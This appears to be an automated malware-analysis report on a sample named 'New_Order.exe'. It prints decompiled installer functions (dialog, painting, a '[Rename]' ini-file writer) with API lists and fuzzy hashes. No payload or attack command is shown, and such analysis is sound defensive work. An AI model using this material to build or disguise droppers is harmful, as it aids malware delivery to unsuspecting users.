                                                                        					if( *0x42f46c <= 0) {
                                                                        						L19:
                                                                        						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                                        						goto L20;
                                                                        					} else {
                                                                        						_t316 = _v24 + 8;
                                                                        						_v32 = _t316;
                                                                        						do {
                                                                        							_t284 =  &(_t316[0x10]);
                                                                        							if( *_t284 != 0) {
                                                                        								_v64 = _t284;
                                                                        								_t285 =  *_t316;
                                                                        								_v88 = _v16;
                                                                        								_t308 = 0x20;
                                                                        								_v84 = 0xffff0002;
                                                                        								_v80 = 0xd;
                                                                        								_v68 = _t308;
                                                                        								_v44 = _t329;
                                                                        								_v72 = _t285 & _t308;
                                                                        								if((_t285 & 0x00000002) == 0) {
                                                                        									if((_t285 & 0x00000004) == 0) {
                                                                        										 *( *0x42a888 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                                        									} else {
                                                                        										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
                                                                        									}
                                                                        								} else {
                                                                        									_v80 = 0x4d;
                                                                        									_v48 = 1;
                                                                        									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                                        									_v36 = 1;
                                                                        									 *( *0x42a888 + _t329 * 4) = _t290;
                                                                        									_v16 =  *( *0x42a888 + _t329 * 4);
                                                                        								}
                                                                        							}
                                                                        							_t329 = _t329 + 1;
                                                                        							_t316 =  &(_v32[0x418]);
                                                                        							_v32 = _t316;
                                                                        						} while (_t329 <  *0x42f46c);
                                                                        						if(_v36 != 0) {
                                                                        							L20:
                                                                        							if(_v20 != 0) {
                                                                        								E004041B0(_v8);
                                                                        								goto L23;
                                                                        							} else {
                                                                        								ShowWindow(_v12, 5);
                                                                        								E004041B0(_v12);
                                                                        								L93:
                                                                        								return E004041E2(_a8, _a12, _a16);
                                                                        							}
                                                                        						}
                                                                        						goto L19;
                                                                        					}
                                                                        				}
                                                                        			}
                                                                        0x00404fad
                                                                        0x00404fb0
                                                                        0x00404fb0
                                                                        0x00404fb6
                                                                        0x00404fbd
                                                                        0x00404fc0
                                                                        0x00404fc0
                                                                        0x00404fc6
                                                                        0x00404fcc
                                                                        0x00404fd2
                                                                        0x00404fd2
                                                                        0x00404fdf
                                                                        0x0040513f
                                                                        0x00405146
                                                                        0x00405163
                                                                        0x00405169
                                                                        0x0040517b
                                                                        0x0040517b
                                                                        0x00000000
                                                                        0x00404fe5
                                                                        0x00404fe7
                                                                        0x00404fec
                                                                        0x00404ff1
                                                                        0x00404ff6
                                                                        0x00404ff8
                                                                        0x00404ff8
                                                                        0x00404ff9
                                                                        0x00404ffa
                                                                        0x00404ffc
                                                                        0x00404ffc
                                                                        0x00405004
                                                                        0x00405045
                                                                        0x00405047
                                                                        0x00405057
                                                                        0x0040505a
                                                                        0x0040505f
                                                                        0x00405066
                                                                        0x00405069
                                                                        0x0040510b
                                                                        0x00405113
                                                                        0x0040511b
                                                                        0x0040511b
                                                                        0x00405121
                                                                        0x00405129
                                                                        0x0040513a
                                                                        0x0040513a
                                                                        0x00000000
                                                                        0x00405129
                                                                        0x0040506f
                                                                        0x00405072
                                                                        0x00405078
                                                                        0x0040507d
                                                                        0x0040507f
                                                                        0x00405081
                                                                        0x00405087
                                                                        0x0040508e
                                                                        0x00405093
                                                                        0x0040509a
                                                                        0x0040509d
                                                                        0x0040509d
                                                                        0x004050a4
                                                                        0x004050b0
                                                                        0x004050b4
                                                                        0x004050b6
                                                                        0x004050b6
                                                                        0x004050a6
                                                                        0x004050a8
                                                                        0x004050a8
                                                                        0x004050d6
                                                                        0x004050e2
                                                                        0x004050f1
                                                                        0x004050f1
                                                                        0x004050f3
                                                                        0x004050f6
                                                                        0x004050ff
                                                                        0x00000000
                                                                        0x00405006
                                                                        0x00405011
                                                                        0x00405014
                                                                        0x00405019
                                                                        0x0040501b
                                                                        0x0040501f
                                                                        0x0040502f
                                                                        0x00405039
                                                                        0x0040503b
                                                                        0x0040503e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00405021
                                                                        0x00405021
                                                                        0x00405027
                                                                        0x00405029
                                                                        0x00405029
                                                                        0x0040502a
                                                                        0x0040502b
                                                                        0x00000000
                                                                        0x00405021
                                                                        0x00405004
                                                                        0x00404fdf
                                                                        0x00404f22
                                                                        0x00000000
                                                                        0x00404f38
                                                                        0x00404f42
                                                                        0x00404f47
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00404f59
                                                                        0x00404f5e
                                                                        0x00404f6a
                                                                        0x00404f6a
                                                                        0x00404f6c
                                                                        0x00404f7b
                                                                        0x00404f7d
                                                                        0x00404f81
                                                                        0x00404f84
                                                                        0x00000000
                                                                        0x00404f84
                                                                        0x00404f22
                                                                        0x00404bd6
                                                                        0x00404bd9
                                                                        0x00404bdc
                                                                        0x00404bec
                                                                        0x00404bff
                                                                        0x00404c0a
                                                                        0x00404c10
                                                                        0x00404c1e
                                                                        0x00404c31
                                                                        0x00404c36
                                                                        0x00404c41
                                                                        0x00404c4a
                                                                        0x00404c60
                                                                        0x00404c70
                                                                        0x00404c7c
                                                                        0x00404c7c
                                                                        0x00404c81
                                                                        0x00404c87
                                                                        0x00404c89
                                                                        0x00404c8c
                                                                        0x00404c91
                                                                        0x00404c96
                                                                        0x00404c98
                                                                        0x00404c98
                                                                        0x00404cb8
                                                                        0x00404cb8
                                                                        0x00404cba
                                                                        0x00404cbb
                                                                        0x00404cc0
                                                                        0x00404cc6
                                                                        0x00404cca
                                                                        0x00404ccf
                                                                        0x00404cd7
                                                                        0x00404cdb
                                                                        0x00404ce0
                                                                        0x00404ce5
                                                                        0x00404ced
                                                                        0x00404cf0
                                                                        0x00404dbf
                                                                        0x00404dd2
                                                                        0x00000000
                                                                        0x00404cf6
                                                                        0x00404cf9
                                                                        0x00404cfc
                                                                        0x00404cff
                                                                        0x00404cff
                                                                        0x00404d04
                                                                        0x00404d0d
                                                                        0x00404d10
                                                                        0x00404d14
                                                                        0x00404d17
                                                                        0x00404d1a
                                                                        0x00404d23
                                                                        0x00404d2c
                                                                        0x00404d2f
                                                                        0x00404d32
                                                                        0x00404d35
                                                                        0x00404d73
                                                                        0x00404d9e
                                                                        0x00404d75
                                                                        0x00404d84
                                                                        0x00404d84
                                                                        0x00404d37
                                                                        0x00404d3a
                                                                        0x00404d48
                                                                        0x00404d52
                                                                        0x00404d5a
                                                                        0x00404d61
                                                                        0x00404d6c
                                                                        0x00404d6c
                                                                        0x00404d35
                                                                        0x00404da4
                                                                        0x00404da5
                                                                        0x00404db1
                                                                        0x00404db1
                                                                        0x00404dbd
                                                                        0x00404dd8
                                                                        0x00404ddb
                                                                        0x00404df8
                                                                        0x00000000
                                                                        0x00404ddd
                                                                        0x00404de2
                                                                        0x00404deb
                                                                        0x0040517d
                                                                        0x0040518f
                                                                        0x0040518f
                                                                        0x00404ddb
                                                                        0x00000000
                                                                        0x00404dbd
                                                                        0x00404cf0

Memory Dump Source
• Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
• Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
• Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
• Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
• Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
• Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
Similarity
• API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
• String ID: $M$N
• API String ID: 2564846305-813528018
• Opcode ID: 05a311050dda4b414fd1261923b8e6b7691581466e425b0fd9ae4ea99a1d7fb6
• Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
• Opcode Fuzzy Hash: 05a311050dda4b414fd1261923b8e6b7691581466e425b0fd9ae4ea99a1d7fb6
• Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 91%
			// Dialog procedure: _a4 = dialog HWND, _a8 = window message, _a12 = wParam, _a16 = lParam.
			// Comments on the numeric constants give the standard Win32 / RichEdit names they correspond to.
			E004042E6(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) { // 0x110 = WM_INITDIALOG
					if(_a8 != 0x111) { // 0x111 = WM_COMMAND
						L11:
						if(_a8 != 0x4e) { // 0x4e = WM_NOTIFY
							if(_a8 == 0x40b) { // application-defined message (WM_USER + 0xb)
								 *0x42985c =  *0x42985c + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E004041E2(_a8, _a12, _t110); // default message handler
						}
						_t52 = GetDlgItem(_a4, 0x3e8); // control id 1000 (the rich edit control)
						_t110 = _a16; // NMHDR*: +8 = code, +0xc = msg
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) { // EN_LINK raised by WM_LBUTTONDOWN
							_t100 =  *((intOrPtr*)(_t110 + 0x1c)); // ENLINK.chrg.cpMax
							_t109 =  *((intOrPtr*)(_t110 + 0x18)); // ENLINK.chrg.cpMin
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42e3c0; // TEXTRANGE.lpstrText: buffer that receives the clicked link
							if(_t100 - _t109 < 0x800) { // only links shorter than 2048 characters
								SendMessageA(_t52, 0x44b, 0,  &_v16); // 0x44b = EM_GETTEXTRANGE
								SetCursor(LoadCursorA(0, 0x7f02)); // 0x7f02 = IDC_WAIT
								_push(1);
								E0040458A(_a4, _v8); // handle the extracted link text
								SetCursor(LoadCursorA(0, 0x7f00)); // 0x7f00 = IDC_ARROW
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) { // EN_MSGFILTER for WM_KEYDOWN
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) { // MSGFILTER.wParam == VK_RETURN
								SendMessageA( *0x42f428, 0x111, 1, 0); // WM_COMMAND, id 1 (IDOK) to the parent window
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) { // VK_ESCAPE
								SendMessageA( *0x42f428, 0x10, 0, 0); // 0x10 = WM_CLOSE
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42985c != 0) { // HIWORD(wParam) = notification code
						goto L25;
					} else {
						_t112 =  *0x42a068 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						// Mirror the state of the check box (control id 1034) into bit 0 of the flags word
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001; // 0xf0 = BM_GETCHECK
						E0040419D(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404566();
						goto L11;
					}
				}
				// WM_INITDIALOG: lParam points at the page description structure
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) { // negative value: index into a lookup table of string offsets
					_t107 =  *0x42ebfc; // 0x7c930d
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x42f478; // string table base + offset
				_push(0x22);
				_a16 =  *_t114; // first byte selects the stream format
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1; // remaining bytes: the text to stream in
				_v16 = _t115;
				_v8 = E004042B1; // EDITSTREAM.pfnCallback
				E0040417B(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E0040417B(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1); // 1 = BST_CHECKED
				E0040419D( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8); // control id 1000 (the rich edit control)
				E004041B0(_t99);
				SendMessageA(_t99, 0x45b, 1, 0); // 0x45b = EM_AUTOURLDETECT, enable
				_t86 =  *( *0x42f434 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86); // negative value encodes a system color index
				}
				SendMessageA(_t99, 0x443, 0, _t86); // 0x443 = EM_SETBKGNDCOLOR
				SendMessageA(_t99, 0x445, 0, 0x4010000); // 0x445 = EM_SETEVENTMASK, ENM_LINK | ENM_KEYEVENTS
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115)); // 0x435 = EM_EXLIMITTEXT
				 *0x42985c = 0;
				SendMessageA(_t99, 0x449, _a16,  &_v16); // 0x449 = EM_STREAMIN, EDITSTREAM at &_v16
				 *0x42985c = 0;
				return 0;
			}

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                        • String ID: GHFGHFGHFDGDFGDFg$N
                                                                        • API String ID: 3103080414-2795107479
                                                                        • Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                                        • Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
                                                                        • Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                                        • Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 90%
                                                                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                        				struct tagLOGBRUSH _v16;
                                                                        				struct tagRECT _v32;
                                                                        				struct tagPAINTSTRUCT _v96;
                                                                        				struct HDC__* _t70;
                                                                        				struct HBRUSH__* _t87;
                                                                        				struct HFONT__* _t94;
                                                                        				long _t102;
                                                                        				signed int _t126;
                                                                        				struct HDC__* _t128;
                                                                        				intOrPtr _t130;
                                                                        
                                                                        				if(_a8 == 0xf) {
                                                                        					_t130 =  *0x42f434;
                                                                        					_t70 = BeginPaint(_a4,  &_v96);
                                                                        					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                        					_a8 = _t70;
                                                                        					GetClientRect(_a4,  &_v32);
                                                                        					_t126 = _v32.bottom;
                                                                        					_v32.bottom = _v32.bottom & 0x00000000;
                                                                        					while(_v32.top < _t126) {
                                                                        						_a12 = _t126 - _v32.top;
                                                                        						asm("cdq");
                                                                        						asm("cdq");
                                                                        						asm("cdq");
                                                                        						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                        						_t87 = CreateBrushIndirect( &_v16);
                                                                        						_v32.bottom = _v32.bottom + 4;
                                                                        						_a16 = _t87;
                                                                        						FillRect(_a8,  &_v32, _t87);
                                                                        						DeleteObject(_a16);
                                                                        						_v32.top = _v32.top + 4;
                                                                        					}
                                                                        					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                        						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                                        						_a16 = _t94;
                                                                        						if(_t94 != 0) {
                                                                        							_t128 = _a8;
                                                                        							_v32.left = 0x10;
                                                                        							_v32.top = 8;
                                                                        							SetBkMode(_t128, 1);
                                                                        							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                        							_a8 = SelectObject(_t128, _a16);
                                                                        							DrawTextA(_t128, "Lat Setup", 0xffffffff,  &_v32, 0x820);
                                                                        							SelectObject(_t128, _a8);
                                                                        							DeleteObject(_a16);
                                                                        						}
                                                                        					}
                                                                        					EndPaint(_a4,  &_v96);
                                                                        					return 0;
                                                                        				}
                                                                        				_t102 = _a16;
                                                                        				if(_a8 == 0x46) {
                                                                        					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                        					 *((intOrPtr*)(_t102 + 4)) =  *0x42f428;
                                                                        				}
                                                                        				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                                        			}

                                                                        APIs
                                                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                        • GetClientRect.USER32 ref: 0040105B
                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                        • FillRect.USER32 ref: 004010E4
                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                        • DrawTextA.USER32(00000000,Lat Setup,000000FF,00000010,00000820), ref: 00401156
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                        • String ID: F$Lat Setup
                                                                        • API String ID: 941294808-173993723
                                                                        • Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                                        • Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
                                                                        • Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                                        • Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00405D66(void* __ecx) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				long _t12;
                                                                        				long _t24;
                                                                        				char* _t31;
                                                                        				int _t37;
                                                                        				void* _t38;
                                                                        				intOrPtr* _t39;
                                                                        				long _t42;
                                                                        				CHAR* _t44;
                                                                        				void* _t46;
                                                                        				void* _t48;
                                                                        				void* _t49;
                                                                        				void* _t52;
                                                                        				void* _t53;
                                                                        
                                                                        				_t38 = __ecx;
                                                                        				_t44 =  *(_t52 + 0x14);
                                                                        				 *0x42c620 = 0x4c554e;
                                                                        				if(_t44 == 0) {
                                                                        					L3:
                                                                        					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca20, 0x400);
                                                                        					if(_t12 != 0 && _t12 <= 0x400) {
                                                                        						_t37 = wsprintfA(0x42c220, "%s=%s\r\n", 0x42c620, 0x42ca20);
                                                                        						_t53 = _t52 + 0x10;
                                                                        						E0040618A(_t37, 0x400, 0x42ca20, 0x42ca20,  *((intOrPtr*)( *0x42f434 + 0x128)));
                                                                        						_t12 = E00405C90(0x42ca20, 0xc0000000, 4);
                                                                        						_t48 = _t12;
                                                                        						 *(_t53 + 0x18) = _t48;
                                                                        						if(_t48 != 0xffffffff) {
                                                                        							_t42 = GetFileSize(_t48, 0);
                                                                        							_t6 = _t37 + 0xa; // 0xa
                                                                        							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                        							if(_t46 == 0 || E00405D08(_t48, _t46, _t42) == 0) {
                                                                        								L18:
                                                                        								return CloseHandle(_t48);
                                                                        							} else {
                                                                        								if(E00405BF5(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                        									_t49 = E00405BF5(_t38, _t21 + 0xa, 0x40a3d8);
                                                                        									if(_t49 == 0) {
                                                                        										_t48 =  *(_t53 + 0x18);
                                                                        										L16:
                                                                        										_t24 = _t42;
                                                                        										L17:
                                                                        										E00405C4B(_t24 + _t46, 0x42c220, _t37);
                                                                        										SetFilePointer(_t48, 0, 0, 0);
                                                                        										E00405D37(_t48, _t46, _t42 + _t37);
                                                                        										GlobalFree(_t46);
                                                                        										goto L18;
                                                                        									}
                                                                        									_t39 = _t46 + _t42;
                                                                        									_t31 = _t39 + _t37;
                                                                        									while(_t39 > _t49) {
                                                                        										 *_t31 =  *_t39;
                                                                        										_t31 = _t31 - 1;
                                                                        										_t39 = _t39 - 1;
                                                                        									}
                                                                        									_t24 = _t49 - _t46 + 1;
                                                                        									_t48 =  *(_t53 + 0x18);
                                                                        									goto L17;
                                                                        								}
                                                                        								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                        								_t42 = _t42 + 0xa;
                                                                        								goto L16;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					CloseHandle(E00405C90(_t44, 0, 1));
                                                                        					_t12 = GetShortPathNameA(_t44, 0x42c620, 0x400);
                                                                        					if(_t12 != 0 && _t12 <= 0x400) {
                                                                        						goto L3;
                                                                        					}
                                                                        				}
                                                                        				return _t12;
                                                                        			}

                                                                        APIs
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
                                                                        • GetShortPathNameA.KERNEL32 ref: 00405DA0
                                                                          • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                                          • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                                        • GetShortPathNameA.KERNEL32 ref: 00405DBD
                                                                        • wsprintfA.USER32 ref: 00405DDB
                                                                        • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
                                                                        • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
                                                                        • GlobalFree.KERNEL32 ref: 00405EC4
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB
                                                                          • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\New_Order.exe,80000000,00000003), ref: 00405C94
                                                                          • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                        • String ID: %s=%s$[Rename]
                                                                        • API String ID: 2171350718-1727408572
                                                                        • Opcode ID: c8a07bbf3a544e04db1531592beb9b39ed12da8dfdba65436ce2583c9172ea3a
                                                                        • Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
                                                                        • Opcode Fuzzy Hash: c8a07bbf3a544e04db1531592beb9b39ed12da8dfdba65436ce2583c9172ea3a
                                                                        • Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 72%
                                                                        			E0040618A(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                                        				struct _ITEMIDLIST* _v8;
                                                                        				char _v12;
                                                                        				signed int _v16;
                                                                        				signed char _v20;
                                                                        				signed int _v24;
                                                                        				signed char _v28;
                                                                        				signed int _t38;
                                                                        				CHAR* _t39;
                                                                        				signed int _t41;
                                                                        				char _t52;
                                                                        				char _t53;
                                                                        				char _t55;
                                                                        				char _t57;
                                                                        				void* _t65;
                                                                        				char* _t66;
                                                                        				signed int _t80;
                                                                        				intOrPtr _t86;
                                                                        				char _t88;
                                                                        				void* _t89;
                                                                        				CHAR* _t90;
                                                                        				void* _t92;
                                                                        				signed int _t97;
                                                                        				signed int _t99;
                                                                        				void* _t100;
                                                                        
                                                                        				_t92 = __esi;
                                                                        				_t89 = __edi;
                                                                        				_t65 = __ebx;
                                                                        				_t38 = _a8;
                                                                        				if(_t38 < 0) {
                                                                        					_t86 =  *0x42ebfc; // 0x7c930d
                                                                        					_t38 =  *(_t86 - 4 + _t38 * 4);
                                                                        				}
                                                                        				_push(_t65);
                                                                        				_push(_t92);
                                                                        				_push(_t89);
                                                                        				_t66 = _t38 +  *0x42f478;
                                                                        				_t39 = 0x42e3c0;
                                                                        				_t90 = 0x42e3c0;
                                                                        				if(_a4 >= 0x42e3c0 && _a4 - 0x42e3c0 < 0x800) {
                                                                        					_t90 = _a4;
                                                                        					_a4 = _a4 & 0x00000000;
                                                                        				}
                                                                        				while(1) {
                                                                        					_t88 =  *_t66;
                                                                        					if(_t88 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					__eflags = _t90 - _t39 - 0x400;
                                                                        					if(_t90 - _t39 >= 0x400) {
                                                                        						break;
                                                                        					}
                                                                        					_t66 = _t66 + 1;
                                                                        					__eflags = _t88 - 4;
                                                                        					_a8 = _t66;
                                                                        					if(__eflags >= 0) {
                                                                        						if(__eflags != 0) {
                                                                        							 *_t90 = _t88;
                                                                        							_t90 =  &(_t90[1]);
                                                                        							__eflags = _t90;
                                                                        						} else {
                                                                        							 *_t90 =  *_t66;
                                                                        							_t90 =  &(_t90[1]);
                                                                        							_t66 = _t66 + 1;
                                                                        						}
                                                                        						continue;
                                                                        					}
                                                                        					_t41 =  *((char*)(_t66 + 1));
                                                                        					_t80 =  *_t66;
                                                                        					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
                                                                        					_v24 = _t80;
                                                                        					_v28 = _t80 | 0x00000080;
                                                                        					_v16 = _t41;
                                                                        					_v20 = _t41 | 0x00000080;
                                                                        					_t66 = _a8 + 2;
                                                                        					__eflags = _t88 - 2;
                                                                        					if(_t88 != 2) {
                                                                        						__eflags = _t88 - 3;
                                                                        						if(_t88 != 3) {
                                                                        							__eflags = _t88 - 1;
                                                                        							if(_t88 == 1) {
                                                                        								__eflags = (_t41 | 0xffffffff) - _t97;
                                                                        								E0040618A(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
                                                                        							}
                                                                        							L42:
                                                                        							_t90 =  &(_t90[lstrlenA(_t90)]);
                                                                        							_t39 = 0x42e3c0;
                                                                        							continue;
                                                                        						}
                                                                        						__eflags = _t97 - 0x1d;
